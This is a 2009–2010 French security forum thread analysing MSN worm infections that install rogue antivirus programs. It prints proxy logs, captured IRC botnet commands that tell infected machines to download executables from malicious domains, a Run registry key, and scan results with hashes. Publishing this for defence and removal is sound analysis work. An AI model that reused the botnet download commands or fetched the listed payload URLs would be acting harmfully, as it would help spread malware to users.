MSN et infections liées

Informations sur les arnaques et Virus sur MSN.
Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 85488
Inscription : 10 sept. 2005 13:57
Contact :

MSN et infections liées

Message par Malekal_morte » 18 juin 2009 12:50

Depuis quelques mois, les infections MSN qui auparavant étaient assez passives si ce n'est le téléchargement de quelques stealer pour voler des mots de passe FTP, de serials de jeux et parfois un peu de Vundo pour monétiser.

Depuis quelques mois, la donne a changé et les infections MSN se sont rapprochés très certains d'autres groupes (probablement russes) et les infections installés sur le botnet sont plus virulentes.

Régulièrement maintenant ce sont des infections plus difficile à éradiquer toujours dans le but de monétiser : Se reporter à ce topic de remontés pour voir l'évolution : 215-226-t17551.html

Aujourd'hui c'est tout simplement un rogue qui a été fait télécharger au botnet :

Code : Tout sélectionner

1245318592.315   1661 192.168.1.200 TCP_MISS/200 335 GET http://theinstalls.com/files
1245318995.774    865 192.168.1.200 TCP_MISS/200 26229 GET http://best-fotos.com/install_133db.exe - DIRECT/216.39.57.104 application/octet-stream
Le domaine best-fotos.com étant déjà utilisé pour propager des infections MSN, se reporter à cette page : http-best-fotos-com-ajer-exe-t19634.html

Le rogue installé est System Security

L'internaute se retrouve alors avec joli fond d'écran noir et un message en rouge :
YOUR COMPUTER IS INFECTED WITH SPYWARE!
YOUR'RE IN DANGER!
Image

Vous trouverez une description plus détaillée de cette infection sur cette page : besthandycap-com-120-t19099.html#p153374
Fichier install_133db.exe reçu le 2009.06.18 09:52:45 (UTC)
Situation actuelle: terminé
Résultat: 5/41 (12.20%)
Formaté Formaté
Impression des résultats Impression des résultats
Antivirus Version Dernière mise à jour Résultat
a-squared 4.5.0.18 2009.06.18 -
AhnLab-V3 5.0.0.2 2009.06.18 -
AntiVir 7.9.0.191 2009.06.18 -
Antiy-AVL 2.0.3.1 2009.06.18 -
Authentium 5.1.2.4 2009.06.17 -
Avast 4.8.1335.0 2009.06.17 -
AVG 8.5.0.339 2009.06.17 -
BitDefender 7.2 2009.06.18 -
CAT-QuickHeal 10.00 2009.06.18 (Suspicious) - DNAScan
ClamAV 0.94.1 2009.06.18 -
Comodo 1361 2009.06.18 -
DrWeb 5.0.0.12182 2009.06.18 -
eSafe 7.0.17.0 2009.06.17 Suspicious File
eTrust-Vet 31.6.6566 2009.06.17 -
F-Prot 4.4.4.56 2009.06.17 -
F-Secure 8.0.14470.0 2009.06.18 -
Fortinet 3.117.0.0 2009.06.18 -
GData 19 2009.06.18 -
Ikarus T3.1.1.59.0 2009.06.18 -
Jiangmin 11.0.706 2009.06.18 -
K7AntiVirus 7.10.766 2009.06.17 -
Kaspersky 7.0.0.125 2009.06.18 -
McAfee 5649 2009.06.17 -
McAfee+Artemis 5649 2009.06.17 -
McAfee-GW-Edition 6.7.6 2009.06.18 Trojan.LooksLike
Microsoft 1.4701 2009.06.18 TrojanDownloader:Win32/Dontovo.A
NOD32 4166 2009.06.18 -
Norman 6.01.09 2009.06.17 -
nProtect 2009.1.8.0 2009.06.18 -
Panda 10.0.0.14 2009.06.17 -
PCTools 4.4.2.0 2009.06.17 -
Prevx 3.0 2009.06.18 -
Rising 21.34.32.00 2009.06.18 -
Sophos 4.42.0 2009.06.18 -
Sunbelt 3.2.1858.2 2009.06.18 MSAntispyware 2009 (v)
Symantec 1.4.4.12 2009.06.18 -
TheHacker 6.3.4.3.348 2009.06.17 -
TrendMicro 8.950.0.1094 2009.06.18 -
VBA32 3.12.10.7 2009.06.18 -
ViRobot 2009.6.18.1793 2009.06.18 -
VirusBuster 4.6.5.0 2009.06.17 -
Information additionnelle
File size: 25600 bytes
MD5 : b34da3df8edb4eb3b7159b5ffbbc9f64
SHA1 : 59f780167866d2dea1901e417c3f94064e900e2c
Fichier dailybucks_install_2_.exe reçu le 2009.06.18 10:10:52 (UTC)
Situation actuelle: terminé
Résultat: 12/41 (29.27%)
Formaté Formaté
Impression des résultats Impression des résultats
Antivirus Version Dernière mise à jour Résultat
a-squared 4.5.0.18 2009.06.18 Trojan.Win32.Winwebsec!IK
AhnLab-V3 5.0.0.2 2009.06.18 -
AntiVir 7.9.0.191 2009.06.18 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.1 2009.06.18 -
Authentium 5.1.2.4 2009.06.17 -
Avast 4.8.1335.0 2009.06.17 -
AVG 8.5.0.339 2009.06.17 Adload_r.JS
BitDefender 7.2 2009.06.18 -
CAT-QuickHeal 10.00 2009.06.18 -
ClamAV 0.94.1 2009.06.18 -
Comodo 1362 2009.06.18 -
DrWeb 5.0.0.12182 2009.06.18 -
eSafe 7.0.17.0 2009.06.17 -
eTrust-Vet 31.6.6566 2009.06.17 -
F-Prot 4.4.4.56 2009.06.17 -
F-Secure 8.0.14470.0 2009.06.18 Trojan-Dropper.Win32.Agent.atmg
Fortinet 3.117.0.0 2009.06.18 -
GData 19 2009.06.18 -
Ikarus T3.1.1.59.0 2009.06.18 Trojan.Win32.Winwebsec
Jiangmin 11.0.706 2009.06.18 -
K7AntiVirus 7.10.766 2009.06.17 -
Kaspersky 7.0.0.125 2009.06.18 Trojan-Dropper.Win32.Agent.atmg
McAfee 5649 2009.06.17 FakeAlert-DZ
McAfee+Artemis 5649 2009.06.17 FakeAlert-DZ
McAfee-GW-Edition 6.7.6 2009.06.18 Trojan.Crypt.ZPACK.Gen
Microsoft 1.4701 2009.06.18 VirTool:Win32/Obfuscator.FR
NOD32 4166 2009.06.18 -
Norman 6.01.09 2009.06.17 -
nProtect 2009.1.8.0 2009.06.18 -
Panda 10.0.0.14 2009.06.17 -
PCTools 4.4.2.0 2009.06.17 -
Prevx 3.0 2009.06.18 -
Rising 21.34.32.00 2009.06.18 Trojan.Win32.FakeAV.nz
Sophos 4.42.0 2009.06.18 -
Sunbelt 3.2.1858.2 2009.06.18 MalwareDoctor
Symantec 1.4.4.12 2009.06.18 -
TheHacker 6.3.4.3.348 2009.06.17 -
TrendMicro 8.950.0.1094 2009.06.18 -
VBA32 3.12.10.7 2009.06.18 -
ViRobot 2009.6.18.1794 2009.06.18 -
VirusBuster 4.6.5.0 2009.06.17 -
Information additionnelle
File size: 505662 bytes
MD5 : 468dfbf92d5ed72b2861f5f932dae0af
SHA1 : 841f2db4edd660fb0f207c3729bad62fa5d20ae1
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 85488
Inscription : 10 sept. 2005 13:57
Contact :

Re: MSN et infections liées

Message par Malekal_morte » 18 juin 2009 12:51

Pour supprimer les infections MSN, suivre la procédure donnée dans ce lien : https://www.malekal.com/VIRUS_MSN.php
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 85488
Inscription : 10 sept. 2005 13:57
Contact :

Re: MSN et infections liées

Message par Malekal_morte » 09 mars 2010 20:13

Depuis quelques jours, le botmaster fait télécharge une autre infection assez connu et répandu de type msa.exe / sshnas.dll

Code : Tout sélectionner

PRIVMSG \.. :[GET]: . http://root.denirulz.org/~denirulz/xd/install.52018.exe to: C:\DOCUME~1\Robert\LOCALS~1\Temp\58.exe..

Code : Tout sélectionner

PRIVMSG #bb# :[GET]: . http://dvdflashworld.com/install.52018.exe to: C:\DOCUME~1\Robert\LOCALS~1\Temp\72.exe..

Code : Tout sélectionner

1268161028.296  66271 192.168.1.200 TCP_MISS/200 101183 GET http://bigvideofiles.com/install.52018.exe - DIRECT/64.120.141.6 application/x-msdownload
1268165981.904  56813 192.168.1.200 TCP_MISS/200 101183 GET http://dvdflashworld.com/install.52018.exe - DIRECT/64.120.141.6 application/x-msdownload

Code : Tout sélectionner

1268166209.852  90815 192.168.1.200 TCP_MISS/200 101201 GET http://root.denirulz.org/%7Edenirulz/xd/install.52018.exe - DIRECT/93.174.93.46 application/x-msdownload
1268166228.096  60859 192.168.1.200 TCP_MISS/200 101201 GET http://93.174.94.86/%7Edenirulz/xd/install.52018.exe - DIRECT/93.174.94.86 application/x-msdownload
Done !
MD5 :
Date : ___
Results :
Virus Names :
Permalink : http://www.virustotal.com/analisis/cd4a ... 1268158051

The results for install.52018.exe are :
Symantec 20091.2.0.41 2010.03.09 Suspicious.Insight
Sophos 4.51.0 2010.03.09 Mal/EncPk-MP
Panda 10.0.2.2 2010.03.09 Suspicious file
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 85488
Inscription : 10 sept. 2005 13:57
Contact :

Re: MSN et infections liées

Message par Malekal_morte » 09 mars 2010 23:20

Code : Tout sélectionner

1268176237.121  45341 192.168.1.200 TCP_MISS/200 74064 GET http://93.174.94.86/%7Edenirulz/xd/cash.exe - DIRECT/93.174.94.86 application/x-msdownload
Done !
MD5 : ebc88477f4d24db02b0dd4b4171d9339
Date : 2010.03.09 20:54:34 (UTC)
Results : 2/42
Virus Names : Suspicious.Insight Suspicious file
Permalink : http://www.virustotal.com/analisis/b646 ... 1268168074

The results for cash.exe are :
Panda 10.0.2.2 2010.03.09 Suspicious file
Symantec 20091.2.0.41 2010.03.09 Suspicious.Insight
On retrouve le pack même que Trojan.MicroJoin voir : trojan-microjoin-rogues-t23813.html

Image
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 85488
Inscription : 10 sept. 2005 13:57
Contact :

Re: MSN et infections liées

Message par Malekal_morte » 30 mai 2010 13:14

Infection MSN de ce topic : tinyurl-com-facebook-photos-2010-jpg-t26025.html
neptune:/tmp# wget tinyurl.com/facebook-photos-30-05-2010-JPG
--2010-05-30 13:03:01-- http://tinyurl.com/facebook-photos-30-05-2010-JPG
Résolution de tinyurl.com... 195.66.135.138, 195.66.135.140
Connexion vers tinyurl.com|195.66.135.138|:80...connecté.
requête HTTP transmise, en attente de la réponse...301 Moved Permanently
Emplacement: http://p8.hostingprod.com/@myfaceblog.o ... 164483.SCR [suivant]
--2010-05-30 13:03:01-- http://p8.hostingprod.com/@myfaceblog.o ... 164483.SCR
Résolution de p8.hostingprod.com... 67.195.140.36
Connexion vers p8.hostingprod.com|67.195.140.36|:80...connecté.
requête HTTP transmise, en attente de la réponse...200 OK
Longueur: 126976 (124K) [application/octet-stream]
Saving to: `PHOTO-JPG-54927164483.SCR'

100%[====================================================================================================================================================>] 126 976 134K/s in 0,9s

2010-05-30 13:03:03 (134 KB/s) - PHOTO-JPG-54927164483.SCR sauvegardé [126976/126976]

qui ajoute cette clef au registre et le fichier :
O4 - HKLM\..\Run: [Windows System Guard] C:\Documents and Settings\robert\Application Data\msng.exe
qui va chercher ces fichiers :

Code : Tout sélectionner

:id_!java@team PRIVMSG n[FRA|XP]8413981 :.dl http://you2323.net/asd1.exe..:id_!java@team PRIVMSG n[FRA|XP]8413981 :.dl http://you2323.net/asd.exe..

Code : Tout sélectionner

1275217415.688    865 192.168.1.222 TCP_MISS/200 83880 GET http://you2323.net/asd1.exe - DIRECT/206.188.192.116 application/x-msdownload
1275217416.217    530 192.168.1.222 TCP_MISS/200 22951 GET http://you2323.net/asd.exe - DIRECT/206.188.192.116 application/x-msdownload
1275217446.143  15993 192.168.1.222 TCP_MISS/200 876335 GET http://96.0.203.114/foto21.rar - DIRECT/96.0.203.114 application/octet-stream
Voir détection sur ces topics :
http-you2323-net-asd-exe-t26017.html
http-you2323-net-asd1-exe-t26016.html

Ce qui donne :
Image

et au final, on obtient le rogue Antispyware Soft
Image

URL associées au rogue :

Code : Tout sélectionner

1275218084.131    140 192.168.1.100 TCP_REFRESH_HIT/200 563 GET http://antispy-guide.com/check?pgid=1 - DIRECT/188.65.74.166 application/octet-stream
1275218265.356    934 192.168.1.94 TCP_MISS/200 102832 GET http://mirkinodeswrs.net/l.php?i=1 - DIRECT/89.111.177.27 application/octet-stream
1275218329.127    164 192.168.1.222 TCP_MISS/200 565 GET http://antispy-guide.net/check?pgid=1 - DIRECT/91.216.73.48 application/octet-stream
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 85488
Inscription : 10 sept. 2005 13:57
Contact :

Re: MSN et infections liées

Message par Malekal_morte » 18 nov. 2010 22:06

Pièces jointes
MSN_WORM_ThinkPoint.png
MSN Worms et ThinkPoint
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Répondre

Revenir vers « Vers/Virus MSN et arnaques sur MSN »

Qui est en ligne ?

Utilisateurs parcourant ce forum : Aucun utilisateur inscrit et 2 invités